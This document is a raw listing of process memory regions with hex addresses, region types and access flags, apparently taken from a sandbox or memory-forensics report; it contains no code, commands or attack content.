234EAA9B000
heap
page read and write
1B32D40A000
trusted library allocation
page read and write
15C8857A000
heap
page read and write
1E39EE00000
heap
page read and write
1B32CFF6000
trusted library allocation
page read and write
7FFD9B921000
trusted library allocation
page read and write
1A8F9030000
trusted library allocation
page read and write
1E3A0F4F000
trusted library allocation
page read and write
1AB87030000
heap
page read and write
7FFD9B762000
trusted library allocation
page read and write
3176179000
stack
page read and write
7DF3FF080000
trusted library allocation
page execute and read and write
7FFD9B980000
trusted library allocation
page read and write
211734EA000
heap
page read and write
7FFD9B7CC000
trusted library allocation
page execute and read and write
7FFD9B950000
trusted library allocation
page execute and read and write
7FFD9BA30000
trusted library allocation
page read and write
18AE47F0000
heap
page execute and read and write
15C8A175000
heap
page read and write
7FFD9BA10000
trusted library allocation
page read and write
1E3B9031000
heap
page read and write
15B9007D000
trusted library allocation
page read and write
2D4D4D40000
trusted library allocation
page read and write
1AB8985F000
trusted library allocation
page read and write
1B32D0E7000
trusted library allocation
page read and write
2803A750000
heap
page read and write
3459FF000
stack
page read and write
234EAAF2000
heap
page read and write
15BF8F59000
heap
page read and write
7FFD9B846000
trusted library allocation
page read and write
7FFD9B770000
trusted library allocation
page read and write
E1C3A7E000
stack
page read and write
1B32CB53000
trusted library allocation
page read and write
28054840000
heap
page read and write
2803A890000
heap
page read and write
2204C3EC000
trusted library allocation
page read and write
2D4D32A5000
heap
page read and write
A05F2FE000
stack
page read and write
1E39EF32000
heap
page read and write
1AB8713A000
heap
page read and write
15CA2744000
heap
page read and write
1B32D28E000
trusted library allocation
page read and write
1B32D075000
trusted library allocation
page read and write
15BF6C80000
heap
page read and write
7FFD9B902000
trusted library allocation
page read and write
15B90071000
trusted library allocation
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
234EAC8C000
heap
page read and write
15BF6E1C000
heap
page read and write
B692F77000
stack
page read and write
1B32D286000
trusted library allocation
page read and write
7FFD9BA40000
trusted library allocation
page read and write
1AB87290000
trusted library allocation
page read and write
1C222650000
trusted library allocation
page read and write
15C8B592000
trusted library allocation
page read and write
21173620000
heap
page read and write
7FFD9B856000
trusted library allocation
page execute and read and write
1A880524000
trusted library allocation
page read and write
1B32D2C0000
trusted library allocation
page read and write
15B80B3A000
trusted library allocation
page read and write
234EAE34000
heap
page read and write
1C22A7D4000
heap
page read and write
1B32D0F3000
trusted library allocation
page read and write
2803D518000
trusted library allocation
page read and write
2203A51E000
heap
page read and write
A05F3FB000
stack
page read and write
7FFD9B911000
trusted library allocation
page read and write
1C212550000
heap
page read and write
1290000
heap
page read and write
1A8F8FE0000
heap
page read and write
7FFD9BA10000
trusted library allocation
page read and write
E1C3DBE000
stack
page read and write
2803A895000
heap
page read and write
7FFD9B764000
trusted library allocation
page read and write
309F000
stack
page read and write
1B32D296000
trusted library allocation
page read and write
1B32D126000
trusted library allocation
page read and write
1B32D2B4000
trusted library allocation
page read and write
1B32D1B3000
trusted library allocation
page read and write
7FFD9BBC0000
trusted library allocation
page read and write
1B32D36D000
trusted library allocation
page read and write
2805425B000
heap
page read and write
635AF8000
stack
page read and write
15B80B9C000
trusted library allocation
page read and write
2203BF24000
heap
page read and write
1B32D416000
trusted library allocation
page read and write
15B80BFA000
trusted library allocation
page read and write
15CA293B000
heap
page read and write
18AE474F000
heap
page read and write
68E563E000
stack
page read and write
15C8C183000
trusted library allocation
page read and write
2803D29E000
trusted library allocation
page read and write
7FFD9BAD0000
trusted library allocation
page read and write
2901B13000
stack
page read and write
1B32D412000
trusted library allocation
page read and write
7FFD9B912000
trusted library allocation
page read and write
15B80A6C000
trusted library allocation
page read and write
7FFD9B930000
trusted library allocation
page execute and read and write
15CA2850000
heap
page read and write
B48000
heap
page read and write
15BF6FC5000
heap
page read and write
5EC000
stack
page read and write
280541E0000
trusted library allocation
page read and write
1B32D165000
trusted library allocation
page read and write
12D0000
heap
page read and write
7FFD9B9F2000
trusted library allocation
page read and write
7FFD9B970000
trusted library allocation
page read and write
2D4D190C000
heap
page read and write
1B32D429000
trusted library allocation
page read and write
1B32D29C000
trusted library allocation
page read and write
2D4D19AD000
heap
page read and write
635BFB000
stack
page read and write
7FFD9B856000
trusted library allocation
page execute and read and write
1B32D0B8000
trusted library allocation
page read and write
1B32CBBD000
trusted library allocation
page read and write
1B344BC1000
heap
page read and write
15B80B43000
trusted library allocation
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
234EAF62000
heap
page read and write
280546A0000
heap
page read and write
7FFD9BA40000
trusted library allocation
page read and write
7FFD9B945000
trusted library allocation
page read and write
15B90010000
trusted library allocation
page read and write
1B32D249000
trusted library allocation
page read and write
7FFD9B980000
trusted library allocation
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
2803C1D5000
heap
page read and write
7FFD9BA30000
trusted library allocation
page read and write
1C22AA12000
heap
page read and write
234EAD91000
heap
page read and write
2B2F000
stack
page read and write
28FE000
stack
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
7FFD9BAE0000
trusted library allocation
page read and write
1B32D17C000
trusted library allocation
page read and write
2203C4F3000
trusted library allocation
page read and write
7FFD9BA20000
trusted library allocation
page read and write
7FFD9B880000
trusted library allocation
page execute and read and write
7FFD9BAA0000
trusted library allocation
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
290257F000
stack
page read and write
1E39EE60000
heap
page read and write
1B32D2A0000
trusted library allocation
page read and write
18ACA640000
heap
page read and write
15C8BC10000
trusted library allocation
page read and write
15BDF39000
stack
page read and write
1A880926000
trusted library allocation
page read and write
29EC000
stack
page read and write
3175B23000
stack
page read and write
1B32D2CF000
trusted library allocation
page read and write
15B80B45000
trusted library allocation
page read and write
1B32D345000
trusted library allocation
page read and write
15C8BBAA000
trusted library allocation
page read and write
1330000
heap
page read and write
6351CE000
stack
page read and write
1A880754000
trusted library allocation
page read and write
1C22A9C6000
heap
page read and write
1B32AAEA000
heap
page read and write
7FFD9BAC3000
trusted library allocation
page read and write
1B32D384000
trusted library allocation
page read and write
2203C323000
trusted library allocation
page read and write
15CA2A6C000
heap
page read and write
1B32AAE1000
heap
page read and write
1B32D085000
trusted library allocation
page read and write
2803E005000
trusted library allocation
page read and write
15C88528000
heap
page read and write
5341F7D000
stack
page read and write
7FFD9B84C000
trusted library allocation
page execute and read and write
15B8013C000
trusted library allocation
page read and write
15B80BCC000
trusted library allocation
page read and write
22054657000
heap
page read and write
2803D5A1000
trusted library allocation
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
2A9191F0000
heap
page read and write
F55000
heap
page read and write
1B32D2EF000
trusted library allocation
page read and write
15C8B414000
trusted library allocation
page read and write
15BD6C2000
stack
page read and write
7FFD9BAC0000
trusted library allocation
page read and write
1C22A792000
heap
page read and write
1B32D112000
trusted library allocation
page read and write
7FFD9B912000
trusted library allocation
page read and write
471000
remote allocation
page execute and read and write
7FFD9B770000
trusted library allocation
page read and write
7FFD9B820000
trusted library allocation
page read and write
15B80C75000
trusted library allocation
page read and write
7FFD9B980000
trusted library allocation
page read and write
2D4EB8CA000
heap
page read and write
7FFD9B77B000
trusted library allocation
page read and write
1C212030000
heap
page read and write
1E3A1360000
trusted library allocation
page read and write
B69290E000
stack
page read and write
1B32D390000
trusted library allocation
page read and write
1E39EF1E000
heap
page read and write
7FFD9B840000
trusted library allocation
page execute and read and write
1B32D365000
trusted library allocation
page read and write
2A919255000
heap
page read and write
1C210580000
heap
page read and write
B735B7B000
stack
page read and write
7FFD9B9B6000
trusted library allocation
page read and write
1E39F080000
heap
page read and write
15C88820000
heap
page read and write
7FFD9BA30000
trusted library allocation
page read and write
15C8A5A2000
trusted library allocation
page read and write
3176278000
stack
page read and write
15BF6DDF000
heap
page read and write
18ACC060000
trusted library allocation
page read and write
2803A7D3000
heap
page read and write
7FFD9BA90000
trusted library allocation
page execute and read and write
7FFD9B9A0000
trusted library allocation
page read and write
E1C3EBE000
stack
page read and write
2D4EBA40000
heap
page read and write
15BF8EFC000
heap
page read and write
7FFD9BA60000
trusted library allocation
page read and write
15C8A2C0000
trusted library allocation
page read and write
7FFD9B92A000
trusted library allocation
page read and write
28054A4D000
heap
page read and write
1C213142000
trusted library allocation
page read and write
B693D4D000
stack
page read and write
1C2226BF000
trusted library allocation
page read and write
1C210633000
heap
page read and write
1AB870FD000
heap
page read and write
1B32D306000
trusted library allocation
page read and write
18AE49D0000
heap
page read and write
7FFD9BBA0000
trusted library allocation
page execute and read and write
15B80530000
trusted library allocation
page read and write
1B344B41000
heap
page read and write
7FFD9B94A000
trusted library allocation
page read and write
15B90001000
trusted library allocation
page read and write
534253F000
stack
page read and write
7FFD9B963000
trusted library allocation
page read and write
2204C562000
trusted library allocation
page read and write
E1C397F000
stack
page read and write
5342179000
stack
page read and write
2DA0000
heap
page read and write
15B80CDD000
trusted library allocation
page read and write
2D4D5047000
trusted library allocation
page read and write
345EBB000
stack
page read and write
B736B46000
stack
page read and write
7FFD9B960000
trusted library allocation
page read and write
21173440000
heap
page read and write
2205447C000
heap
page read and write
27F1000
heap
page read and write
7FFD9BAF2000
trusted library allocation
page read and write
7FFD9B793000
trusted library allocation
page execute and read and write
21173770000
heap
page read and write
2D4EBA20000
heap
page read and write
15BF8F5B000
heap
page read and write
1B32D3C3000
trusted library allocation
page read and write
1C22AA23000
heap
page read and write
7FFD9B930000
trusted library allocation
page execute and read and write
7FFD9B950000
trusted library allocation
page execute and read and write
7FFD9B941000
trusted library allocation
page read and write
15B80C87000
trusted library allocation
page read and write
B736A4E000
stack
page read and write
7FFD9B77B000
trusted library allocation
page read and write
2203BF30000
heap
page read and write
B736BCD000
stack
page read and write
7FFD9BA00000
trusted library allocation
page read and write
7FFD9B960000
trusted library allocation
page read and write
1B32D336000
trusted library allocation
page read and write
68E52FD000
stack
page read and write
1A8804DD000
trusted library allocation
page read and write
234EAE49000
heap
page read and write
1B32D3AB000
trusted library allocation
page read and write
1020000
heap
page read and write
2D4EBCBD000
heap
page read and write
18ACA875000
heap
page read and write
7FFD9B960000
trusted library allocation
page execute and read and write
5342236000
stack
page read and write
7FFD9BA50000
trusted library allocation
page read and write
15B8018F000
trusted library allocation
page read and write
15B80646000
trusted library allocation
page read and write
1B32D445000
trusted library allocation
page read and write
7FFD9BA40000
trusted library allocation
page read and write
1B32D3B3000
trusted library allocation
page read and write
7FFD9B880000
trusted library allocation
page execute and read and write
15B80C39000
trusted library allocation
page read and write
15B80C0F000
trusted library allocation
page read and write
1B32D361000
trusted library allocation
page read and write
2203A4A0000
heap
page read and write
7FFD9B952000
trusted library allocation
page read and write
7FFD9BA20000
trusted library allocation
page read and write
15B80B17000
trusted library allocation
page read and write
E95000
heap
page read and write
1C210550000
heap
page read and write
34694D000
stack
page read and write
1ABA123D000
heap
page read and write
1B32D1C7000
trusted library allocation
page read and write
15C885A3000
heap
page read and write
7FFD9BA10000
trusted library allocation
page read and write
1B32D24C000
trusted library allocation
page read and write
1B32D332000
trusted library allocation
page read and write
7FFD9B940000
trusted library allocation
page execute and read and write
1E3B0F6F000
trusted library allocation
page read and write
2203DE20000
trusted library allocation
page read and write
1E3A17D1000
trusted library allocation
page read and write
1E39F140000
trusted library allocation
page read and write
7FFD9BAC0000
trusted library allocation
page read and write
1A8F9774000
heap
page read and write
345BBC000
stack
page read and write
234EAE14000
heap
page read and write
15B80C91000
trusted library allocation
page read and write
2803A7D8000
heap
page read and write
1C21060C000
heap
page read and write
1B32D198000
trusted library allocation
page read and write
7FFD9BA60000
trusted library allocation
page read and write
15B804AC000
trusted library allocation
page read and write
6355FD000
stack
page read and write
1B32D151000
trusted library allocation
page read and write
1B32D435000
trusted library allocation
page read and write
1C212B1D000
trusted library allocation
page read and write
2803D967000
trusted library allocation
page read and write
7FFD9B816000
trusted library allocation
page read and write
1B32D178000
trusted library allocation
page read and write
7FFD9B990000
trusted library allocation
page read and write
7FFD9BA90000
trusted library allocation
page read and write
15BF8EA8000
heap
page read and write
9CA297E000
stack
page read and write
1360000
heap
page read and write
1B32D11E000
trusted library allocation
page read and write
234EAAA7000
heap
page read and write
2D4D1C40000
heap
page read and write
2D4D32E0000
trusted library allocation
page read and write
18ACC1C0000
heap
page execute and read and write
B692FF9000
stack
page read and write
7FFD9B940000
trusted library allocation
page execute and read and write
1E39EF18000
heap
page read and write
7FFD9B8A0000
trusted library allocation
page execute and read and write
2204C3FB000
trusted library allocation
page read and write
1B32D388000
trusted library allocation
page read and write
E1C490E000
stack
page read and write
7FFD9B764000
trusted library allocation
page read and write
1A880903000
trusted library allocation
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
1B32D273000
trusted library allocation
page read and write
1A8F9832000
heap
page read and write
63557F000
stack
page read and write
2D4EBC90000
heap
page read and write
1E39F155000
heap
page read and write
1128000
heap
page read and write
1B32AA58000
heap
page read and write
1B32D1A0000
trusted library allocation
page read and write
2203A3D0000
heap
page read and write
1B32D190000
trusted library allocation
page read and write
E1C3AF8000
stack
page read and write
15B80B86000
trusted library allocation
page read and write
400000
system
page execute and read and write
345D3E000
stack
page read and write
1B32D35D000
trusted library allocation
page read and write
15CA270D000
heap
page read and write
1B32D0BC000
trusted library allocation
page read and write
1B32D41D000
trusted library allocation
page read and write
68E56BE000
stack
page read and write
2901F7E000
stack
page read and write
F8E000
stack
page read and write
7FFD9B92A000
trusted library allocation
page read and write
1A8F9850000
heap
page read and write
7FFD9BA80000
trusted library allocation
page read and write
15BE13C000
stack
page read and write
290247E000
stack
page read and write
3176F4E000
stack
page read and write
15B80BCA000
trusted library allocation
page read and write
15BF8F08000
heap
page read and write
1C222669000
trusted library allocation
page read and write
18ACDC6C000
trusted library allocation
page read and write
7FFD9BA90000
trusted library allocation
page read and write
7FFD9B974000
trusted library allocation
page read and write
2D4D1C4E000
heap
page read and write
7FFD9B910000
trusted library allocation
page read and write
1B32AB25000
heap
page read and write
7FFD9BB80000
trusted library allocation
page read and write
1B32D25F000
trusted library allocation
page read and write
1A8F97CE000
heap
page read and write
15BF8D00000
heap
page execute and read and write
2A919250000
heap
page read and write
1A890011000
trusted library allocation
page read and write
15BDFBF000
stack
page read and write
1B32D3CB000
trusted library allocation
page read and write
15B80BE3000
trusted library allocation
page read and write
1B32C8A0000
trusted library allocation
page read and write
D3B000
stack
page read and write
234EABB1000
heap
page read and write
B692C7F000
stack
page read and write
15CA2716000
heap
page read and write
7FFD9B773000
trusted library allocation
page execute and read and write
234EAB90000
heap
page read and write
15C8A84E000
trusted library allocation
page read and write
1AB870F1000
heap
page read and write
1B32D159000
trusted library allocation
page read and write
1B32D169000
trusted library allocation
page read and write
1B32C540000
heap
page read and write
34587E000
stack
page read and write
B69327E000
stack
page read and write
2205468B000
heap
page read and write
1AB991BF000
trusted library allocation
page read and write
18AE48A0000
heap
page execute and read and write
16AF000
stack
page read and write
1AB895FB000
trusted library allocation
page read and write
1B32D2D3000
trusted library allocation
page read and write
7FFD9BA10000
trusted library allocation
page read and write
1A8F76BD000
heap
page read and write
1B32D10A000
trusted library allocation
page read and write
2204CBAB000
trusted library allocation
page read and write
63577F000
stack
page read and write
15BF6D60000
heap
page read and write
1B32AB05000
heap
page read and write
7FFD9B7EC000
trusted library allocation
page execute and read and write
2804C4CC000
trusted library allocation
page read and write
7FFD9BA20000
trusted library allocation
page read and write
317657B000
stack
page read and write
1B32D3A8000
trusted library allocation
page read and write
18ACA670000
heap
page read and write
9CA3A0D000
stack
page read and write
1A880738000
trusted library allocation
page read and write
1E3B0F43000
trusted library allocation
page read and write
1B32D1FA000
trusted library allocation
page read and write
7FFD9B920000
trusted library allocation
page execute and read and write
68E527E000
stack
page read and write
9DE000
stack
page read and write
1AB89658000
trusted library allocation
page read and write
1C212B5A000
trusted library allocation
page read and write
1A8F76D7000
heap
page read and write
7FFD9B950000
trusted library allocation
page execute and read and write
15BF6DDB000
heap
page read and write
2D4D3370000
heap
page read and write
1B32D282000
trusted library allocation
page read and write
15C8BBE9000
trusted library allocation
page read and write
15BDB7E000
stack
page read and write
15B80CAF000
trusted library allocation
page read and write
1A8F9750000
heap
page read and write
234EAC8C000
heap
page read and write
7FFD9BA60000
trusted library allocation
page read and write
15B80AB7000
trusted library allocation
page read and write
1E3A10FC000
trusted library allocation
page read and write
3004000
heap
page read and write
7FFD9BAC0000
trusted library allocation
page read and write
1C211F95000
heap
page read and write
15BF8D20000
trusted library allocation
page read and write
53422BE000
stack
page read and write
15BD74F000
stack
page read and write
63660E000
stack
page read and write
7FFD9B922000
trusted library allocation
page read and write
15C887E0000
trusted library allocation
page read and write
234E8D5E000
heap
page read and write
1B32D26F000
trusted library allocation
page read and write
EFE000
stack
page read and write
DEDE1DD000
stack
page read and write
1A88022C000
trusted library allocation
page read and write
2203A4FE000
heap
page read and write
7FFD9BA60000
trusted library allocation
page read and write
1B32D292000
trusted library allocation
page read and write
18ACD883000
trusted library allocation
page read and write
B6930FE000
stack
page read and write
1C212D54000
trusted library allocation
page read and write
2803DFE6000
trusted library allocation
page read and write
1B32D194000
trusted library allocation
page read and write
1C210588000
heap
page read and write
5341EFF000
stack
page read and write
1B32D09C000
trusted library allocation
page read and write
2203C651000
trusted library allocation
page read and write
1A89009E000
trusted library allocation
page read and write
7FFD9B8A0000
trusted library allocation
page execute and read and write
1B32D14D000
trusted library allocation
page read and write
220546B4000
heap
page read and write
7FFD9B772000
trusted library allocation
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
7FFD9BA50000
trusted library allocation
page read and write
1A890072000
trusted library allocation
page read and write
1B32D3DB000
trusted library allocation
page read and write
1B32D21D000
trusted library allocation
page read and write
1E3B0EF9000
trusted library allocation
page read and write
7FFD9B876000
trusted library allocation
page execute and read and write
EA0000
heap
page read and write
15B806AB000
trusted library allocation
page read and write
15B8041A000
trusted library allocation
page read and write
7FFD9B78D000
trusted library allocation
page execute and read and write
7FFD9BA90000
trusted library allocation
page read and write
7FFD9B79D000
trusted library allocation
page execute and read and write
15BF6F80000
heap
page read and write
1B32D34D000
trusted library allocation
page read and write
15B80A41000
trusted library allocation
page read and write
2803A792000
heap
page read and write
7FFD9BA70000
trusted library allocation
page read and write
1A8F9085000
heap
page read and write
7FFD9BB8A000
trusted library allocation
page read and write
FD0000
heap
page read and write
15BF8D60000
heap
page read and write
1B32C8F0000
trusted library allocation
page read and write
302F000
stack
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
345E3E000
stack
page read and write
7FFD9B81C000
trusted library allocation
page execute and read and write
234EABCD000
heap
page read and write
7FFD9BA00000
trusted library allocation
page read and write
E1C39FF000
stack
page read and write
1B344B89000
heap
page read and write
2203D88E000
trusted library allocation
page read and write
1E3A1366000
trusted library allocation
page read and write
2204C2DB000
trusted library allocation
page read and write
7FFD9B922000
trusted library allocation
page read and write
234E8D37000
heap
page read and write
234EAE1D000
heap
page read and write
1B344EDE000
heap
page read and write
7FFD9B830000
trusted library allocation
page read and write
1B32D06E000
trusted library allocation
page read and write
635B7F000
stack
page read and write
2D4D18D0000
heap
page read and write
15B80C0B000
trusted library allocation
page read and write
18ACDC20000
trusted library allocation
page read and write
7FFD9B7A0000
trusted library allocation
page read and write
1E39EEF0000
heap
page read and write
A05EAFE000
stack
page read and write
1B32D2D7000
trusted library allocation
page read and write
15C9A672000
trusted library allocation
page read and write
1B32D380000
trusted library allocation
page read and write
7FFD9BBA0000
trusted library allocation
page read and write
7FFD9B763000
trusted library allocation
page execute and read and write
2203D8B3000
trusted library allocation
page read and write
7FFD9BC10000
trusted library allocation
page read and write
1B32D1F2000
trusted library allocation
page read and write
1B32D19C000
trusted library allocation
page read and write
1B32C54A000
heap
page read and write
3F10000
heap
page read and write
234EAC8D000
heap
page read and write
2203A2F0000
heap
page read and write
1B32D441000
trusted library allocation
page read and write
39AB000
stack
page read and write
1B32D341000
trusted library allocation
page read and write
2D4EB960000
heap
page execute and read and write
7DF41A230000
trusted library allocation
page execute and read and write
7FFD9B911000
trusted library allocation
page read and write
7FFD9B940000
trusted library allocation
page execute and read and write
1A88054E000
trusted library allocation
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
15B80B7A000
trusted library allocation
page read and write
2203C50C000
trusted library allocation
page read and write
234EAE54000
heap
page read and write
7FFD9BBD6000
trusted library allocation
page read and write
15CA2768000
heap
page read and write
234EABE5000
heap
page read and write
1AB87270000
trusted library allocation
page read and write
5341FFE000
stack
page read and write
220546B8000
heap
page read and write
1B32CFE9000
trusted library allocation
page read and write
234EAC8C000
heap
page read and write
1E3A114E000
trusted library allocation
page read and write
15B80A8C000
trusted library allocation
page read and write
1A8F7608000
heap
page read and write
7FFD9BA90000
trusted library allocation
page read and write
1368000
heap
page read and write
7FFD9BAC0000
trusted library allocation
page read and write
400000
system
page execute and read and write
7FFD9B810000
trusted library allocation
page read and write
15B80C80000
trusted library allocation
page read and write
534243E000
stack
page read and write
2D4E3550000
trusted library allocation
page read and write
CF4000
stack
page read and write
15B80682000
trusted library allocation
page read and write
1AB89372000
trusted library allocation
page read and write
EA0000
heap
page read and write
7FFD9B990000
trusted library allocation
page read and write
31762FE000
stack
page read and write
2D4EB9A0000
heap
page execute and read and write
15B80A2D000
trusted library allocation
page read and write
7FFD9B792000
trusted library allocation
page read and write
7FFD9B990000
trusted library allocation
page read and write
68E573B000
stack
page read and write
2D80000
heap
page read and write
1ABA1370000
heap
page read and write
15B80C6E000
trusted library allocation
page read and write
15C8AF79000
trusted library allocation
page read and write
2803C170000
heap
page read and write
1B32D3F2000
trusted library allocation
page read and write
40AB000
heap
page read and write
1E3B92CB000
heap
page read and write
2D4D510C000
trusted library allocation
page read and write
2203D886000
trusted library allocation
page read and write
1E39EF16000
heap
page read and write
1B32D1DB000
trusted library allocation
page read and write
1C210795000
heap
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
1B32ABB5000
heap
page read and write
1A8F9950000
heap
page read and write
1AB99141000
trusted library allocation
page read and write
15C8A370000
heap
page execute and read and write
2D4E34FC000
trusted library allocation
page read and write
2804C4EA000
trusted library allocation
page read and write
9CA28FD000
stack
page read and write
2203DB93000
trusted library allocation
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
5342F8E000
stack
page read and write
1E39EEB2000
heap
page read and write
7FFD9B840000
trusted library allocation
page read and write
2D4D3557000
trusted library allocation
page read and write
1B32D15D000
trusted library allocation
page read and write
1B32D174000
trusted library allocation
page read and write
1C212490000
heap
page readonly
15C8B5CE000
trusted library allocation
page read and write
F40000
heap
page read and write
7FFD9BA80000
trusted library allocation
page read and write
2803C050000
heap
page read and write
234E8D00000
heap
page read and write
234E8D58000
heap
page read and write
1B32D2E7000
trusted library allocation
page read and write
18ACC1D0000
heap
page read and write
2A9191D0000
heap
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
7FFD9B790000
trusted library allocation
page read and write
7FFD9B8B0000
trusted library allocation
page execute and read and write
18ACDCA6000
trusted library allocation
page read and write
1E3A13AD000
trusted library allocation
page read and write
1A890001000
trusted library allocation
page read and write
1B32D0CF000
trusted library allocation
page read and write
234EAE20000
heap
page read and write
15BF6F8B000
heap
page read and write
15B80D2D000
trusted library allocation
page read and write
1B32D398000
trusted library allocation
page read and write
2803D0E2000
trusted library allocation
page read and write
B736ACE000
stack
page read and write
1ABA1240000
heap
page read and write
15BDE3C000
stack
page read and write
7FFD9BA50000
trusted library allocation
page read and write
18ADC42F000
trusted library allocation
page read and write
234EAE80000
heap
page read and write
7FFD9B942000
trusted library allocation
page read and write
290217E000
stack
page read and write
1AB893C0000
trusted library allocation
page read and write
15B80C14000
trusted library allocation
page read and write
1AB89C10000
trusted library allocation
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
15CA2820000
heap
page execute and read and write
1E3A0D90000
trusted library allocation
page read and write
7FFD9BA10000
trusted library allocation
page read and write
53421BE000
stack
page read and write
1C21286C000
trusted library allocation
page read and write
7FFD9BB20000
trusted library allocation
page read and write
15C9A3A1000
trusted library allocation
page read and write
1B32D42D000
trusted library allocation
page read and write
2D4EB8D9000
heap
page read and write
1B32CFFA000
trusted library allocation
page read and write
234EAE87000
heap
page read and write
1A880020000
trusted library allocation
page read and write
53425BB000
stack
page read and write
15C8855A000
heap
page read and write
18ADC566000
trusted library allocation
page read and write
1E3A1377000
trusted library allocation
page read and write
7FFD9BAD0000
trusted library allocation
page read and write
1B32D241000
trusted library allocation
page read and write
1B32D106000
trusted library allocation
page read and write
7FFD9B774000
trusted library allocation
page read and write
7FFD9B81C000
trusted library allocation
page execute and read and write
234EABFC000
heap
page read and write
1B32AB70000
heap
page read and write
15BF6E1A000
heap
page read and write
1C212480000
trusted library allocation
page read and write
15CA2720000
heap
page read and write
2D4D3280000
trusted library allocation
page read and write
15BDA7E000
stack
page read and write
2804C4DA000
trusted library allocation
page read and write
2203C0F0000
heap
page execute and read and write
15C8BCD1000
trusted library allocation
page read and write
234EAAB3000
heap
page read and write
15B805A1000
trusted library allocation
page read and write
372F000
stack
page read and write
2203A430000
heap
page read and write
A05F0FD000
stack
page read and write
2203BD60000
trusted library allocation
page read and write
54701FF000
unkown
page read and write
7FFD9B941000
trusted library allocation
page read and write
234EAE80000
heap
page read and write
1ABA1360000
heap
page execute and read and write
7FFD9B82C000
trusted library allocation
page execute and read and write
2AF0000
heap
page read and write
1B32D16D000
trusted library allocation
page read and write
2203A500000
heap
page read and write
7FFD9B816000
trusted library allocation
page read and write
1B32D0A4000
trusted library allocation
page read and write
15BF6DD2000
heap
page read and write
1ABA1238000
heap
page read and write
18ACA6AE000
heap
page read and write
234EABED000
heap
page read and write
7FFD9BA80000
trusted library allocation
page read and write
2803A7AC000
heap
page read and write
2203D50D000
trusted library allocation
page read and write
7FFD9B92A000
trusted library allocation
page read and write
1AB86F50000
heap
page read and write
2D4EBCB0000
heap
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
15BF8C80000
heap
page execute and read and write
1E39F055000
heap
page read and write
15B80BF2000
trusted library allocation
page read and write
1B32D2F3000
trusted library allocation
page read and write
15B80142000
trusted library allocation
page read and write
1B32CB10000
heap
page execute and read and write
7FFD9B942000
trusted library allocation
page read and write
234EABF3000
heap
page read and write
7FFD9BA80000
trusted library allocation
page read and write
7FFD9BB70000
trusted library allocation
page read and write
7FFD9BA80000
trusted library allocation
page read and write
2804C211000
trusted library allocation
page read and write
456000
system
page execute and read and write
7FFD9BAA0000
trusted library allocation
page read and write
CDB000
stack
page read and write
471000
remote allocation
page execute and read and write
1A8F8EA0000
heap
page read and write
1B32D30E000
trusted library allocation
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
1ABA1172000
heap
page read and write
11A0000
heap
page read and write
211734E0000
heap
page read and write
1C22A828000
heap
page read and write
7FFD9B958000
trusted library allocation
page read and write
9CA2F7B000
stack
page read and write
1B32D406000
trusted library allocation
page read and write
63567E000
stack
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
3DDF000
stack
page read and write
400000
system
page execute and read and write
2D4D34D1000
trusted library allocation
page read and write
7FFD9BA50000
trusted library allocation
page read and write
7FFD9B77D000
trusted library allocation
page execute and read and write
1B32C520000
trusted library allocation
page read and write
1E39EDE0000
heap
page read and write
234EAE4F000
heap
page read and write
220546E4000
heap
page read and write
7FFD9BA60000
trusted library allocation
page read and write
1B32D219000
trusted library allocation
page read and write
7FFD9BA30000
trusted library allocation
page read and write
1B344E80000
heap
page read and write
2203A4B0000
heap
page readonly
7FFD9BA70000
trusted library allocation
page read and write
1C212AD0000
trusted library allocation
page read and write
15C8B744000
trusted library allocation
page read and write
7FFD9B782000
trusted library allocation
page read and write
1AB871B0000
heap
page read and write
3175BAF000
unkown
page read and write
975000
heap
page read and write
7FFD9B816000
trusted library allocation
page read and write
68E4DCF000
stack
page read and write
2803DA4C000
trusted library allocation
page read and write
7FFD9BAD0000
trusted library allocation
page read and write
2203C74E000
trusted library allocation
page read and write
234EAB06000
heap
page read and write
3B6E000
stack
page read and write
11A9000
heap
page read and write
220546AF000
heap
page read and write
1B32D27E000
trusted library allocation
page read and write
1C222860000
trusted library allocation
page read and write
1B32D2B8000
trusted library allocation
page read and write
1C2126BD000
trusted library allocation
page read and write
B735DFD000
stack
page read and write
B735EFE000
stack
page read and write
234EAE86000
heap
page read and write
15B80CC7000
trusted library allocation
page read and write
7FFD9BAD8000
trusted library allocation
page read and write
7DF3FF070000
trusted library allocation
page execute and read and write
1B32D2B0000
trusted library allocation
page read and write
7FFD9B950000
trusted library allocation
page execute and read and write
1A880490000
trusted library allocation
page read and write
234EAB91000
heap
page read and write
1B32D3E3000
trusted library allocation
page read and write
1C212510000
trusted library allocation
page read and write
15C8C1A3000
trusted library allocation
page read and write
234E8E10000
heap
page read and write
1ABA1367000
heap
page execute and read and write
345A7E000
stack
page read and write
2D4EB8D7000
heap
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
2D4D4D6B000
trusted library allocation
page read and write
234EAE0F000
heap
page read and write
1B32C360000
heap
page read and write
7FFD9BA20000
trusted library allocation
page read and write
68E50FD000
stack
page read and write
18ADC423000
trusted library allocation
page read and write
7FFD9BA50000
trusted library allocation
page read and write
18ACDF27000
trusted library allocation
page read and write
234E8D59000
heap
page read and write
1B32D371000
trusted library allocation
page read and write
29F0000
heap
page read and write
3C6E000
stack
page read and write
1B32AA50000
heap
page read and write
635A7E000
stack
page read and write
234EAAE0000
heap
page read and write
2803A794000
heap
page read and write
2803A813000
heap
page read and write
11AE000
heap
page read and write
1B32D3A0000
trusted library allocation
page read and write
1AB87280000
heap
page readonly
7FFD9B820000
trusted library allocation
page execute and read and write
7FFD9B820000
trusted library allocation
page read and write
7FFD9B940000
trusted library allocation
page execute and read and write
7FFD9B9D0000
trusted library allocation
page read and write
234EAF68000
heap
page read and write
15BF6F30000
heap
page readonly
21173775000
heap
page read and write
2803D4E5000
trusted library allocation
page read and write
1E3A13FA000
